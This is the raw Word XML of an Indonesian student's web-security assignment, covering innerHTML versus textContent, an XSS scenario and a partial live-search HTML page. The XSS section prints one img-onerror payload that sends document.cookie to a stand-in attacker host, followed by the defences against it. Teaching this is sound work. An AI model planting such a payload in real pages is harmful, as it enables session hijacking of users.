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3DDF0" w14:textId="1EA84D2F" w:rsidR="004C3256" w:rsidRDefault="00000000" w:rsidP="00B055F3">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1418"/>
        </w:tabs>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Mata Kuliah   </w:t>
      </w:r>
      <w:r w:rsidR="00B055F3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>: WAD05 - Web Application Development</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B60D4A" w14:textId="39A5D23A" w:rsidR="004C3256" w:rsidRDefault="00000000" w:rsidP="00B055F3">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1418"/>
        </w:tabs>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Judul Tugas   </w:t>
      </w:r>
      <w:r w:rsidR="00B055F3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>: Technical Assignment 1: Web Security &amp; JavaScript DOM Manipulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3028A634" w14:textId="297EBFDB" w:rsidR="004C3256" w:rsidRDefault="00000000" w:rsidP="00B055F3">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1418"/>
        </w:tabs>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Nama          </w:t>
      </w:r>
      <w:r w:rsidR="00B055F3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>: Izhar Rahman Dwiputra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227CD5F6" w14:textId="7E9304A7" w:rsidR="004C3256" w:rsidRDefault="00000000" w:rsidP="00B055F3">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1418"/>
        </w:tabs>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">NIM           </w:t>
      </w:r>
      <w:r w:rsidR="00B055F3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>: 25120300032</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E8C365" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="400" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t>Soal 1 Perbandingan innerHTML dan textContent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599CA8AC" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000" w:rsidP="00AE7333">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>innerHTML dan textContent sama-sama dapat digunakan untuk memasukkan isi ke dalam elemen HTML, tetapi keduanya memiliki cara kerja yang berbeda.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FFB1B5" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000" w:rsidP="00AE7333">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>innerHTML memproses string yang diberikan sebagai kode HTML. Sebagai contoh, ketika elemen.innerHTML = "&lt;b&gt;Halo&lt;/b&gt;", teks "Halo" akan ditampilkan dalam format tebal karena tag &lt;b&gt; diproses oleh browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1151519C" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000" w:rsidP="00AE7333">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Sebaliknya, textContent memperlakukan seluruh nilai yang diberikan sebagai teks biasa. Jika digunakan dengan elemen.textContent = "&lt;b&gt;Halo&lt;/b&gt;", browser akan menampilkan tulisan "&lt;b&gt;Halo&lt;/b&gt;" apa adanya; tag tersebut tidak diproses sebagai HTML.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B493E0" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000" w:rsidP="00AE7333">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>innerHTML sebaiknya digunakan ketika struktur HTML memang diperlukan dan sumber datanya telah dipastikan aman. Sementara itu, textContent lebih tepat digunakan untuk menampilkan teks, terutama teks yang berasal dari input pengguna, karena metode ini lebih aman terhadap serangan XSS seperti yang dibahas pada Soal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256" w14:paraId="2471C40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659A0025" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>elemen.innerHTML = "&lt;i&gt;" + komentarUser + "&lt;/i&gt;";</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60046A60" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>// berisiko apabila komentarUser mengandung skrip berbahaya</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3B7A5AF9" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t>Perbandingan dengan versi yang lebih aman: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256" w14:paraId="55E85E4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6000C3CB" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>elemen.textContent = komentarUser;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18642B93" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>// aman karena nilai hanya ditampilkan sebagai teks dan tidak dieksekusi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4E7676C8" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t>Dengan demikian, apabila sumber data belum dapat dipastikan keamanannya, textContent merupakan pilihan yang lebih aman.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B7A316" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF840F5" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="400" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Soal 2 Skenario Cross Site Scripting XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE0D92A" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000" w:rsidP="00AE7333">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Sebagai ilustrasi, sebuah blog memiliki kolom komentar. Ketika menampilkan komentar pengguna, pengembang tidak melakukan validasi terhadap input dan langsung menggunakan innerHTML untuk memasukkan komentar tersebut ke halaman.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF7D1C8" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000" w:rsidP="00AE7333">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Penyerang tidak selalu dapat menjalankan tag &lt;script&gt; secara langsung. Ketika tag tersebut disisipkan melalui innerHTML, browser tidak mengeksekusinya. Namun, penyerang dapat memanfaatkan elemen &lt;img&gt; dengan sumber gambar yang sengaja dibuat tidak valid, lalu menggunakan atribut onerror untuk menjalankan kode, seperti pada contoh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256" w14:paraId="5FD8D65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3437E855" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;img src="x" onerror="fetch('https://web-jahat.com/curi?cookie=' + document.cookie)"&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1CA31901" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000" w:rsidP="00AE7333">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Ketika pengguna lain membuka halaman tersebut, elemen &lt;img&gt; gagal dimuat sehingga atribut onerror dijalankan secara otomatis di browser korban. Kode pada atribut tersebut dapat digunakan untuk mengirim cookie atau data sesi ke server milik penyerang.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3802EF97" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000" w:rsidP="00AE7333">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Dampaknya cukup serius. Penyerang dapat mencuri sesi login (session hijacking) sehingga dapat mengakses akun korban tanpa mengetahui kata sandinya. Serangan ini juga dapat digunakan untuk mengarahkan korban ke situs phishing atau menyebarkan skrip ke komentar lain seperti worm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AE3E7B" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000" w:rsidP="00AE7333">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Upaya pencegahan dapat dilakukan melalui beberapa langkah: (1) jangan mempercayai input pengguna secara langsung; lakukan validasi dan penyaringan terlebih dahulu; (2) gunakan textContent, bukan innerHTML, ketika menampilkan data dari pengguna, seperti yang dijelaskan pada Soal 1; dan (3) terapkan Content Security Policy (CSP) pada server sebagai lapisan perlindungan tambahan agar browser menolak skrip yang tidak tepercaya.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9FF197" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000" w:rsidP="00AE7333">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Prinsip dasarnya adalah jangan pernah mempercayai input pengguna secara langsung.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4903FFD4" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="397A36EA" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="400" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Soal 3 Live Search dengan createElement dan textContent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2099931D" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000" w:rsidP="00AE7333">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Kode berikut menerapkan fitur live search. Setiap kali pengguna mengetik pada kolom pencarian melalui event input, data disaring menggunakan array.filter(). Hasil penyaringan kemudian ditampilkan kembali menggunakan createElement dan textContent. Pendekatan ini tidak menggunakan innerHTML sehingga lebih aman terhadap XSS, sesuai dengan pembahasan pada Soal 2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAD8CC9" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Berkas program: Izhar_25120300032_WAD05_Task2.html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256" w14:paraId="12EC2F7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50" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="150" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="22FEDF47" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;!DOCTYPE html&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26C85B9F" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;html lang="id"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F6F9868" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;head&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2736D015" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;meta charset="UTF-8"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CD98AAB" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;title&gt;Cari Menu Warteg Dekat Kampus&lt;/title&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40A9C88B" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;style&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C7F5117" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  body { font-family: 'Comic Sans MS', 'Segoe UI', sans-serif; max-width: 600px; margin: 40px auto; color: #222; }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B56BBF7" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  h1 { font-size: 22px; color: #d9480f; }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5975E00D" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  #searchBox { width: 100%; padding: 10px; font-size: 16px; box-sizing: border-box; margin-bottom: 12px; border: 2px solid #d9480f; border-radius: 6px; }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A212D17" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  #hasilList { list-style: none; padding: 0; }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05CB8115" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  #hasilList li { padding: 10px; background: #fff3e0; margin-bottom: 6px; border-radius: 6px; }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B23BF2B" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  #infoJumlah { color: #888; font-size: 13px; }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5569CBD5" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;/style&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56BD83EB" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;/head&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F7AAA89" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;body&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FED0D47" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24234FE3" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;h1&gt;Cari Menu Warteg Dekat Kampus&lt;/h1&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79BC6AF0" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;p&gt;Masih bingung menentukan menu makan? Ketik kata kunci pada kolom pencarian untuk menyaring daftar menu tanpa memuat ulang halaman.&lt;/p&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C5F7139" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0487711A" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;input type="text" id="searchBox" placeholder="Cari menu hari ini..."&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B0A9A4E" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;p id="infoJumlah"&gt;&lt;/p&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40CE9474" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;ul id="hasilList"&gt;&lt;/ul&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5021F21E" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="415249C8" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CE5522E" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  // daftar menu disimpan dalam array agar mudah dikelola</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="548E5DFD" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  const daftarMenu = [</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74B8A459" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    "Nasi + Ayam Goreng",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A85EAAF" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    "Nasi + Telur Balado",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E891B42" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    "Mie Goreng Spesial",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CE78B17" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    "Nasi + Tempe Orek",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39CFE293" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    "Nasi + Ikan Bawal Goreng",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7733E67C" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    "Nasi + Sayur Sop",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D1E0F05" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    "Nasi + Rendang",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="253302EB" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    "Nasi Uduk + Bihun",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3103AB84" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    "Nasi + Perkedel + Tahu",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74D7BEFE" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    "Nasi + Ayam Bakar"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13C70086" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
